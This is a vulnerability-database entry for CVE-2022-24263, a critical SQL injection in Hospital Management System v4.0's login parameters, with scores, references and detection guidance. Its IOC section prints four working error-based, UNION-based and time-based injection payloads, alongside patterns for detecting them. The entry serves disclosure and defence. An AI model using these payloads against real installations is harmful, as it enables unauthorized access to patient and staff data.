CVE-2022-24263
published 2022-01-31CVE-2022-24263: Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
8.24%
94.2th percentile
Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandemail=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login↗
commandemail=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login↗
commandusername3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login↗
commandusername3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login↗
- →Monitor POST requests to func.php, function.php, contact.php, and func3.php for SQL injection patterns including SLEEP(), UNION ALL SELECT, and FLOOR(RAND()) error-based payloads in the email, txtName, txtPhone, and username3 parameters. ↗
- →Detect time-based blind SQLi via SLEEP() calls in POST body parameters (e.g., txtName, email); alert on SLEEP values >= 3 seconds originating from these endpoints. ↗
- →Detect error-based SQLi using FLOOR(RAND()*2) GROUP BY CONCAT pattern in POST parameters targeting the email and username3 fields on login endpoints (patsub=Login, docsub1=Login). ↗
- →Look for the hex-encoded canary strings 0x7162706271 and 0x716b767a71 (decoding to 'qbpbq' and 'qkvzq') in HTTP responses, which are SQLi UNION/error-based confirmation markers used by the attacker. ↗
- ·The vulnerable application is Hospital Management System v4.0 only; the affected files are func.php, function.php, contact.php, and func3.php. Detection rules should be scoped to these specific paths to avoid false positives on other PHP applications. ↗
- ·The exploit targets POST parameters (email, txtName, txtPhone, username3); WAF or IDS rules should inspect POST body content, not just URL query strings, for these endpoints. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.htmlhttps://github.com/kishan0725/Hospital-Management-System/issues/17https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263https://github.com/truonghuuphuc/CVEhttps://www.nu11secur1ty.com/2022/02/cve-2022-24263.htmlhttp://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.htmlhttps://github.com/kishan0725/Hospital-Management-System/issues/17https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263https://github.com/truonghuuphuc/CVEhttps://www.nu11secur1ty.com/2022/02/cve-2022-24263.html
2022-01-31
Published